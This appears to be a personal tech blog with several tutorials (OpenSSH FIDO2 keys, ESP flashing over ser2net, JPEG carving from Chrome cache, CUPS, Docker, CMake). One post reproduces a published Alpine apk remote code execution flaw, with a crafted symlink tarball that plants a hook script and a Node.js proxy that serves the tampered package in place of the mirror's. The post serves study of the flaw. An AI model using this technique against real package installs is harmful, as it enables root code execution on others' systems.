Matheus Bratfisch - Cogito ergo sum

Building OpenSSH 8.2 and using FIDO2 U2F for SSH authentication

OpenSSH 8.2 was just released with support for FIDO2 U2F keys. This is a nice extra layer of security!

As it is not yet in the official Fedora repositories, we will need to build OpenSSH 8.2 ourselves if we want to test it.

OpenSSH 8.2 needs libfido2, and libfido2 needs libcbor and systemd-devel. There is no libfido2 package on Fedora 31 yet, so we also need to build it.

Let’s start installing some dependencies:

$ sudo dnf group install 'Development Tools'
$ sudo dnf install libselinux-devel libselinux libcbor libcbor-devel systemd-devel cmake

To install libfido2:

$ git clone git@github.com:Yubico/libfido2.git
$ cd libfido2
$ (rm -rf build && mkdir build && cd build && cmake ..)
$ make -C build
$ sudo make -C build install

Here we are cloning the code and basically using their commands to install it.

With this dependency ready, let's get OpenSSH 8.2:

$ mkdir openssl-8
$ cd openssl-8
$ mkdir test-openssh
$ wget http://cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-8.2p1.tar.gz
$ tar xvzf openssh-8.2p1.tar.gz
$ cd openssh-8.2p1

With the code in place we will use configure to prepare it:

$ ./configure --with-security-key-builtin --with-md5-passwords --with-selinux --with-privsep-path=$HOME/openssl-8/test-openssh --sysconfdir=$HOME/openssl-8/test-openssh --prefix=$HOME/openssl-8/test-openssh

Note: --with-security-key-builtin is important to have built-in FIDO2 support. This configuration sets the install paths to $HOME/openssl-8/test-openssh; my idea here is to avoid messing with my existing SSH installation.

After this completes we can run make and make install:

$ make
$ make install

I also had to create a udev rule:

$ sudo vim /etc/udev/rules.d/90-fido.rules

With this content:

KERNEL=="hidraw*", SUBSYSTEM=="hidraw", \
  MODE="0664", GROUP="plugdev", ATTRS{idVendor}=="1050"

After all this, I entered the binary folder:

$ cd $HOME/openssl-8/test-openssh/bin

To run the binaries we must prefix them with ./, otherwise the system-wide binaries would be used, and we want to run exactly the ones we just built. I'm not sure why, but when I was running ssh-keygen it had trouble finding libfido2.so.2:

$ ./ssh-keygen -t ecdsa-sk -f /tmp/test_ecdsa_sk
Generating public/private ecdsa-sk key pair.
You may need to touch your authenticator to authorize key generation.
/home/matheus/openssl-8/test-openssh/libexec/ssh-sk-helper: error while loading shared libraries: libfido2.so.2: cannot open shared object file: No such file or directory
ssh_msg_recv: read header: Connection reset by peer
client_converse: receive: unexpected internal error
reap_helper: helper exited with non-zero exit status
Key enrollment failed: unexpected internal error

In my case I found the location of this file and copied it to /usr/lib64/libfido2.so.2.
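
Since make install typically puts the library under /usr/local/lib64 (or /usr/local/lib), which is not always in the dynamic linker path, another option instead of copying the file is to point the linker at that directory; a hedged sketch (the file name local-lib64.conf is just an example):

$ find /usr/local -name "libfido2.so.2"
$ echo "/usr/local/lib64" | sudo tee /etc/ld.so.conf.d/local-lib64.conf
$ sudo ldconfig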

After this, running the key generation command without the FIDO2 key plugged in gave me:

$ ./ssh-keygen -t ecdsa-sk -f /tmp/test_ecdsa_sk
Generating public/private ecdsa-sk key pair.
You may need to touch your authenticator to authorize key generation.
Key enrollment failed: device not found

Plugging the key in and trying again:

$ ./ssh-keygen -t ecdsa-sk -f /tmp/test_ecdsa_sk
Generating public/private ecdsa-sk key pair.
You may need to touch your authenticator to authorize key generation.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /tmp/test_ecdsa_sk
Your public key has been saved in /tmp/test_ecdsa_sk.pub
The key fingerprint is:
SHA256:.../... [email protected]

The key was generated successfully!

Now I needed a server which supports this, so I created a Dockerfile based on ubuntu:20.04 running sshd from OpenSSH 8.2.

I'm using ubuntu:20.04 because it already has libfido2 and libcbor available through apt.

FROM ubuntu:20.04
RUN apt-get update && apt-get -y install software-properties-common build-essential zlib1g-dev libssl-dev libcbor-dev wget
RUN apt-add-repository -y ppa:yubico/stable && apt-get update && apt-get -y install libfido2-dev
RUN apt-get -y install ssh && apt-get -y remove ssh
RUN wget http://cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-8.2p1.tar.gz
RUN tar xvzf openssh-8.2p1.tar.gz
RUN cd openssh-8.2p1 && ./configure --with-security-key-builtin --with-md5-passwords && make && make install 
EXPOSE 22
CMD ["/usr/local/sbin/sshd", "-D"]

To build and run this:

$ docker build -t ubuntussh .
$ docker run -p 2222:22 -v /tmp/test_ecdsa_sk.pub:/root/.ssh/authorized_keys -it ubuntussh bash

Now you will be inside the docker container; I had to chown the authorized_keys file and start sshd:

$ chown -R root:root ~/.ssh/
$ /usr/local/sbin/sshd

Open a new terminal and cd into the openssl 8 bin folder again.

SSH_AUTH_SOCK= ./ssh -o "PasswordAuthentication=no" -o "IdentitiesOnly=yes" -i /tmp/test_ecdsa_sk root@localhost -p 2222

Setting SSH_AUTH_SOCK to empty avoids using the ssh-agent that is already running, and -i specifies exactly the key I want to use.

This outputs:

Enter passphrase for key '/tmp/test_ecdsa_sk': 
Confirm user presence for key ECDSA-SK SHA256:bsIjeSdrNiB4FhxfYBoHH2sCXLiISu9sxDFNrFLgBwY

Now we are logged into the ubuntussh container using FIDO2 + passphrase!

Hope this helps you, Matheus

References:
https://bugs.archlinux.org/task/65513
https://github.com/Yubico/libfido2
https://www.openssh.com/txt/release-8.2
http://cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/


Use a remote serial port to flash an ESP

Recently I got back to playing with some ESP8266 boards as I decided to make my home smarter. Taking a look at my boards I noticed I didn't have any 3.3V board to flash them. Looking a bit further I found I had a Raspberry Pi around, so I could simply use it.

After doing the setup and being able to flash using the Raspberry Pi, it felt too cumbersome to program on it over VNC or something like that. Therefore I decided to try using a remote serial port.

At first I tried socat, but I couldn't get it to work; it seems it doesn't forward some specific serial signals. After some googling I found ser2net, which is compliant with RFC 2217.

To install ser2net on my raspberry pi I used:

$ sudo apt-get install ser2net

After this to create a tunnel and expose it on my machine I used:

$ ssh -L 8086:localhost:8086 pi@IP_ADDRESS '/usr/sbin/ser2net -d -C "8086:raw:600:/dev/ttyAMA0:115200"'

Basically I'm forwarding my local port 8086 to port 8086 on the remote device, where ser2net exposes /dev/ttyAMA0 in raw mode, with a 600-second timeout and a baud rate of 115200.
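
If you prefer not to start ser2net by hand over SSH, the same mapping can live in /etc/ser2net.conf on the Pi so it comes up with the service; a sketch using the classic port:state:timeout:device:options line format:

8086:raw:600:/dev/ttyAMA0:115200 8DATABITS NONE 1STOPBIT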

To be able to flash my ESP8266 I used:

$ esptool.py -p socket://localhost:8086 write_flash -fm dio 0x000000 BasicOTA.ino.generic.bin

Note the -p socket:// option; with it, esptool communicates over the TCP socket instead of a local serial device.

I hope this will be helpful for you. Matheus


Testing RCE on Alpine Linux via APK

I have been studying a bit of security, and one of the things I do from time to time is read CVEs and try to reproduce and understand what is happening. Yesterday Max Justicz published Remote Code Execution in Alpine Linux. He found an issue in apk, the package manager for Alpine Linux, which is super popular in docker images.

Max did a great job explaining the steps and the reasoning, but I wanted to try it myself.

- Create a folder at /etc/apk/commit_hooks.d/, which doesn’t exist by default. Extracted folders are not suffixed with .apk-new.

- Create a symlink to /etc/apk/commit_hooks.d/x named anything – say, link. This gets expanded to be called link.apk-new but still points to /etc/apk/commit_hooks.d/x.

- Create a regular file named link (which will also be expanded to link.apk-new). This will write through the symlink and create a file at /etc/apk/commit_hooks.d/x.

- When apk realizes that the package’s hash doesn’t match the signed index, it will first unlink link.apk-new – but /etc/apk/commit_hooks.d/x will persist! It will then fail to unlink /etc/apk/commit_hooks.d/ with ENOTEMPTY because the directory now contains our payload.

The instructions seem simple, but if you are not super familiar with how a tar file works, you may not understand them. In a tar file you can have multiple entries with the same name, and you can extract a specific one using the --occurrence option. With this in mind the instructions make a bit more sense, so shall we try to create this file?
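
Here is a quick demo of that tar behavior with throwaway file names, just to make the idea concrete:

$ echo one > file && tar -cf demo.tar file
$ echo two > file && tar -rf demo.tar file     # append a second entry with the same name
$ tar -tvf demo.tar                            # "file" shows up twice
$ tar -xf demo.tar --occurrence=1 file         # extract only the first occurrence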

First of all, let’s create the directories:

sudo mkdir /etc/apk/commit_hooks.d/
mkdir folder_for_link
mkdir folder_for_real_file

Create the link:

ln -s /etc/apk/commit_hooks.d/x folder_for_link/magic

Create the real file on folder_for_real_file/magic with this content:

#!/bin/sh

echo "something" > /tmp/test-12346-YAY
echo "ha" > /testfileroot

(If it really works we should end up with a /tmp/test-12346-YAY file and a /testfileroot too.)

Cool, now it seems we have almost everything we need! Let’s create the apk with:

tar -zcvf bad-intention.apk /etc/apk/commit_hooks.d/ -C $PWD/folder_for_link/ magic -C $PWD/folder_for_real_file/ magic

Here we are adding these three things in sequence to the tar file; you can check the tar content with the t option:

$ tar tvf bad-intention.apk
drwxr-xr-x root/root         0 2018-09-13 19:44 etc/apk/commit_hooks.d/
lrwxrwxrwx root/root         0 2018-09-13 19:37 magic -> /etc/apk/commit_hooks.d/x
-rwxrwxrwx root/root       954 2018-09-13 23:24 magic

(Pay attention to the order of these entries: creation of the commit_hooks.d directory, creation of the link, and creation of the file.)

What should the behavior be now? Since apk on Alpine runs from /, it will create the folder /etc/apk/commit_hooks.d, later it will extract the link, and finally it will write the content of magic through the link, which places it inside the x file. Note: I lost A LOT of time trying to reproduce this behavior with tar itself, but tar doesn't behave this way; apk implements its own extractor.

OK, now we need to deliver this file when apk add runs inside docker. Here I updated /etc/hosts and pointed dl-cdn.alpinelinux.org to localhost. Using the node libraries http-mitm-proxy, http-proxy and request, I created a script that serves the bad .apk whenever the requested URL contains ltrace; otherwise it downloads the real file and passes it along to docker.

var http = require('http'),
    httpProxy = require('http-proxy'),
    request = require('request'),
    fileSystem = require('fs'),
    path = require('path');

var proxy = httpProxy.createProxyServer({});

var server = http.createServer(function(req, res) {
  console.log('http://nl.alpinelinux.org' + req.url)
  if (req.url.indexOf('ltrace') > -1) {
    // the requested URL mentions ltrace: serve our malicious apk instead of the real package
    console.log("Trapped")
    var filePath = path.join(__dirname, 'bad-intention.apk');
    var stat = fileSystem.statSync(filePath);
    var readStream = fileSystem.createReadStream(filePath);
    readStream.pipe(res);
  } else {
      // anything else: fetch the real file from the mirror and stream it back to apk
      proxy = request('http://nl.alpinelinux.org' + req.url)
      proxy.on('response', function (a, b) {}).pipe(res);
  }
});

console.log("listening on port 80")
server.listen(80);
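
To run it (assuming the script above is saved as proxy.js, a name I am picking here), install its two npm dependencies and start it as root, since it binds port 80:

$ npm install http-proxy request
$ sudo node proxy.js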

I build my docker image with docker build -t alpinetest --network=host --no-cache . and this Dockerfile:

FROM alpine:3.8

# RUN apk add python
RUN apk add ltrace

CMD "/bin/sh"

(If you are curious, you can inspect the resulting container even if the build failed and check that your files really ended up in the correct places. Use docker commit CONTAINER_ID and docker run -it SHA256_STRING sh.)

This returned “The command ‘/bin/sh -c apk add ltrace’ returned a non-zero code: 1”. This happened because apk verifies the signature of the apk and tries to clean up the files, but it is not able to, since /etc/apk/commit_hooks.d contains a file. How do we do some magic to make apk return exit code 0? Max found one (or two) ways of doing this.

I still need to study what exactly his python script does to fix the exit code, but I have tested it and it really works; as a quick test you can add RUN apk add python and update folder_for_real_file/magic to call his python code.

I know this may sound simple, but it took me a while to figure out all the tiny details. If you find any mistake I made, or want to say something, drop me a line!

Matheus


Find images in Chrome cache files (or any other file!)

Good night,

Recently I deleted a few images whose old links had been broken for the last few days, and I decided to try to find them in the Google Chrome cache. The URL chrome://cache was recently removed, but you can find your chrome cache files at /home/matheus/.cache/google-chrome/Default/Cache/.

If you open one of these as binary, you will see it is not the cached file directly. There is more information embedded in it, such as the URL, headers, HTTP status code and others. We could take a look at the Chrome source code (Chrome cache storage) to extract everything from the file, not only images, but to be honest I was too lazy to dig into that because I had a very specific need in this case.

Why not scan the cache files for the JPEG binary directly? We just need to know how to find the start and end of an image:

  • bytes 0xFF, 0xD8 indicate start of image
  • bytes 0xFF, 0xD9 indicate end of image

OK. So how would we do this in python?

Open the file as binary and check if there is a JFIF or Exif marker in it (just to skip files we can't process):

f = open(filepath, 'rb')

data = f.read()
if b'JFIF' not in data and b'Exif' not in data:
	return

Now let's iterate over all the bytes trying to find those sequences. To achieve this, let's keep prev with the value of the previous byte, pos to know which position we're at, and two lists, soi (Start Of Image) and eoi (End Of Image), which will hold the positions of these markers. If the previous byte is FF and the current one is D8, we append to soi; if it is D9, we append to eoi.

prev = None
soi = []
eoi = []
pos = 0
for b in bytearray(data):  # bytearray yields ints on both Python 2 and 3
	if prev is None:
		prev = b
		pos = pos + 1
		continue
	if prev == 0xFF:
		if b == 0xD8:
			soi.append(pos-1)
		elif b == 0xD9:
			eoi.append(pos-1)
	prev = b
	pos = pos + 1

We can now take the SOI and EOI positions and save the image. The only magic here is taking the first SOI and, for the end, the last SOI or EOI, depending on which one is bigger.

path, filename = os.path.split(filepath)
file = open('{}/{}-{}.jpg'.format(OUTPUT_FOLDER, filename, 0), 'wb')
m1 = soi[0]
m2 = soi[-1] if soi[-1] > eoi[-1] else eoi[-1]
file.write(data[m1:m2])

file.close()

print(filename, "SOI", soi, len(soi))
print(filename, "EOI", eoi, len(eoi))

This code will save only one image. If you want you could iterate over the SOI and EOI and save multiple files.

Would this be some kind of file carving?

I hope this helps you! Matheus

Here is the full script: create the OUTPUT_FOLDER and run it as python yourfile.py filetocheck. This version should be able to handle multiple images inside the same file, so you can point it at a whole cache file or output stream, for instance.

import os
import glob
import sys

OUTPUT_FOLDER = "output-this2"


def save_file(data, path, filename, count, eoi, soi):
	file = open('{}/{}-{}.jpg'.format(OUTPUT_FOLDER, filename, count), 'wb')
	m1 = soi[0]
	m2 = soi[-1] if soi[-1] > eoi[-1] else eoi[-1]
	file.write(data[m1:m2])
	file.close()

def extract(filepath):
	count = 0
	f = open(filepath, 'rb')

	data = f.read()
	if b'JFIF' not in data and b'Exif' not in data:
		return

	path, filename = os.path.split(filepath)

	old_soi = []
	old_eoi = []
	prev = None
	soi = []
	eoi = []
	eoi_found = False
	pos = 0
	for b in bytearray(data):  # bytearray yields ints on both Python 2 and 3
		if prev is None:
			prev = b
			pos = pos + 1
			continue
		if prev == 0xFF:
			if b == 0xD8:
				if eoi_found:
					save_file(data, path, filename, count, eoi, soi)
					old_soi = old_soi + soi
					old_eoi = old_eoi + eoi
					soi = []
					eoi = []
					count = count + 1
					eoi_found = False
				soi.append(pos-1)
			elif b == 0xD9:
				eoi.append(pos-1)
				eoi_found = True
				eoi_found = True
		prev = b
		pos = pos + 1

	save_file(data, path, filename, count, eoi, soi)
	print(filename, "SOI", soi, len(old_soi))
	print(filename, "EOI", eoi, len(old_eoi))

def main():
	if len(sys.argv) < 2:
		sys.exit(1)

	extract(sys.argv[1])

if __name__=="__main__":
	main()

Reference: https://stackoverflow.com/questions/4585527/detect-eof-for-jpg-images


Printer connected to a Raspberry Pi, accessible from the network

Hey guys,

For a long time my father has been complaining that using the printer wasn't practical enough, so to solve this I decided to connect a Raspberry Pi Zero W to my printer (HP Deskjet F2050) and share the printer using CUPS.

Initially you need to connect to your RPi and install CUPS.

sudo apt-get install cups

If you want a web interface to configure it from your local network, update /etc/cups/cupsd.conf:

sudo vim /etc/cups/cupsd.conf

Find the line:

Listen localhost:631

And update it to:

# Listen localhost:631
Port 631

You will have multiple <Location> sections; if you want to allow access only from your computer, add Allow from YOUR_IP to every section. Example:

<Location />
  Order allow,deny
  Allow from 10.0.0.2
</Location>

(If you want to allow access from anywhere, use Allow from all.)

Add your user (in my case pi) to the lpadmin group:

sudo usermod -a -G lpadmin pi
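
After changing cupsd.conf and the group membership, CUPS most likely needs to be restarted for the changes to take effect:

sudo systemctl restart cups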

Access your Raspberry Pi's IP in your browser on port 631 (https://RPI_IP:631/).

Go to the Administration - Add Printer menu. You should see your local printer there; select it and follow the wizard to set it up.

If you're using an HP printer and can't find yours, try:

sudo apt-get install hplip

And reboot.

Let me know if you have any problems.

See you, Matheus


Update the default git commit author and reset the author of existing commits

If you would like to set your global git author, use:

git config --global user.name "Your name"
git config --global user.email "[email protected]"

After having it set globally, you can set your git author per project using:

git config user.name "Your name"
git config user.email "[email protected]"

And as a bonus, if you need to reset the author of the last commit:

git commit --amend --reset-author

If you want to do it for multiple commits, use an interactive rebase:

git rebase -i <COMMIT_HASH>
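
In the editor that opens, mark each commit you want to fix with edit instead of pick; then, at every stop, amend and continue (a quick sketch):

git commit --amend --reset-author --no-edit
git rebase --continue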

See you, Matheus


Docker-compose with PHP-FPM, sendmail, nginx, mariadb serving jekyll and wordpress

As I explained recently, I had a blog running WordPress and decided to move to Jekyll, but there was a catch: I didn't want to lose any link pointing to my WordPress blog. To achieve this, I set up nginx to first try to find a static file from Jekyll and, if it is not found, fall back to WordPress.

I was running my server on an EC2 instance with RDS and it was becoming a bit expensive, so I decided to move everything to one machine and dockerize my setup so I could easily switch servers.

To achieve this, I have created a docker-compose with:

  • PHP-FPM and sendmail to process PHP and send mail
  • Nginx to serve jekyll static files and if they’re not found serve my old wordpress blog
  • MariaDB as my database for WordPress

version: '3'
services:
  fpm:
    # image: php:7.0-fpm-alpine
    build: php7fpm
    restart: always
    volumes:
      - ./wordpress.matbra.com/:/var/www/wordpress.matbra.com
      - ./php7fpm/sendmail.mc:/usr/share/sendmail/cf/debian/sendmail.mc
      - ./php7fpm/gmail-auth.db:/etc/mail/authinfo/gmail-auth.db
    ports:
      - "9000:9000"
    links:
      - mariadb 
    hostname: boarders.com.br
  
  nginx:
    image: nginx:1.10.1-alpine
    restart: always
    volumes:
      - ./nginx/nginx.conf:/etc/nginx/nginx.conf
      - ./nginx/app.vhost:/etc/nginx/conf.d/default.conf
      - ./logs/nginx:/var/log/nginx
      - ./wordpress.matbra.com/:/var/www/wordpress.matbra.com
      - ./jekyll.matbra.com/:/var/www/jekyll.matbra.com
    ports:
      - "80:80"
      - "443:443"
    links:
      - fpm

  mariadb:
    image: mariadb
    restart: always
    environment:
      - MYSQL_ROOT_PASSWORD=yourpassword
      - MYSQL_DATABASE=
    volumes:
    -   ./data/db:/var/lib/mysql

PHP-FPM container:

I'm using a custom Dockerfile which starts from php:7.0-fpm and adds sendmail support and the mysql extension. There is a custom start script which runs sendmail + php-fpm. (I know I should create a separate container for sendmail.)

In this container I'm basically mapping some PHP files and config files:

  • ./wordpress.matbra.com to /var/www/wordpress.matbra.com which are my wordpress files
  • ./php7fpm/sendmail.mc to /usr/share/sendmail/cf/debian/sendmail.mc which is my configuration file for sendmail
  • ./php7fpm/gmail-auth.db to /etc/mail/authinfo/gmail-auth.db which holds the credentials for my Gmail relay (see Configuring gmail as relay to sendmail)

I'm also mapping port 9000 to 9000 so nginx can talk to PHP-FPM on this port, creating a link to mariadb, and setting the hostname.

NGINX container:

I'm using the regular nginx alpine image with some mappings:

  • ./nginx/nginx.conf to /etc/nginx/nginx.conf which is my nginx configuration
  • ./nginx/app.vhost to /etc/nginx/conf.d/default.conf which is my website configuration with Jekyll falling back to wordpress
  • ./logs/nginx to /var/log/nginx which will be my log directory
  • ./wordpress.matbra.com/ to /var/www/wordpress.matbra.com which is the place where nginx can find wordpress website
  • ./jekyll.matbra.com/ to /var/www/jekyll.matbra.com which is the place where nginx can find jekyll website

I'm also mapping ports 80 to 80 and 443 to 443, and creating a link to PHP-FPM so nginx can communicate with the fpm container.

MARIADB container:

No mystery here: the regular mariadb image, with a mapping for the data directory and some environment variables.

Because I'm not adding my website files to the image, I created a script called init.sh to remove the website directory and clone the website from git. There is another script, update-config.sh, which updates the wp-config.php file with the correct environment variables.

With this I can easily spin up a new machine with my website structure.
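
A minimal sketch of bringing the stack up on a fresh machine (assuming the init.sh and update-config.sh scripts live at the repository root and are executable):

$ git clone https://github.com/x-warrior/blog-docker.git && cd blog-docker
$ ./init.sh
$ ./update-config.sh
$ docker-compose up -d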

https://github.com/x-warrior/blog-docker

I hope this will be helpful for you. Matheus


Install ZNC IRC Bouncer on AWS Linux

If you want to install the ZNC IRC bouncer you will need CMake, but the CMake shipped with AWS Linux is too old. See [Update your cmake to 3.x](http://www.matbra.com/2017/12/07/install-cmake-on-aws-linux.html).

Now you will need git to clone the ZNC source code and openssl-devel to have SSL support:

# yum install git openssl-devel

Clone ZNC source code

$ git clone https://github.com/znc/znc.git

Enter on the source code folder

$ cd znc

Initialize submodules

$ git submodule update --init --recursive

Install it with:

$ cmake . 
$ make
# make install (run this as root #)

Configure it with:

$ znc --makeconf

Best regards, Matheus


Install CMake 3 on AWS Linux

If you are trying to build something using CMake and are getting the error “CMake 3.1 or higher is required. You are running version 2.8.12.2”, you can manually install a newer CMake version.

To do this, I first removed the previous CMake:

# yum remove cmake

Test that it was really removed:

$ cmake 
-bash: /usr/bin/cmake: No such file or directory

Install G++

# yum install gcc-c++

Download the latest version (from the CMake download page):

$ wget https://cmake.org/files/v3.10/cmake-3.10.0.tar.gz

Extract it:

$ tar -xvzf cmake-3.10.0.tar.gz

Enter the cmake folder:

$ cd cmake-3.10.0

Install it with:

# ./bootstrap
# make
# make install

Now you should have cmake under /usr/local/bin/cmake
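
You can double-check that the new version is the one being picked up:

$ /usr/local/bin/cmake --version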

Best regards, Matheus


Loopback model migration using a PostgreSQL database

I have been playing with Loopback; initially I was just declaring models and using the in-memory datasource, but now I got to a point where I need a persistent database.

I couldn't easily find how to keep my database synced with my models. I'm not sure if it's because I'm not that familiar with Loopback yet, or if their documentation is not clear enough.

To create a script to sync your models with your database you can create a file under bin/ called autoupdate.js and add the following:

var path = require('path');

var app = require(path.resolve(__dirname, '../server/server'));
var ds = app.datasources.db;
ds.autoupdate(function(err) {
  if (err) throw err;
  ds.disconnect();
});

The code is pretty simple: it fetches the app from server.js, grabs the datasource and runs the autoupdate command. You could use automigrate instead, but that one recreates the tables and wipes the data every time, so pay attention to this.
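
Then run it from the project root (the path bin/autoupdate.js matches where we created the file above):

$ node bin/autoupdate.js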

I think this will work for most datasources, but if it doesn't work for yours, drop me a line. I can try to help :D

Matheus

PS: Loopback will not create migrations and handle them as properly as Django does; sometimes you can end up in weird states. It seems Loopback works better with NoSQL databases.
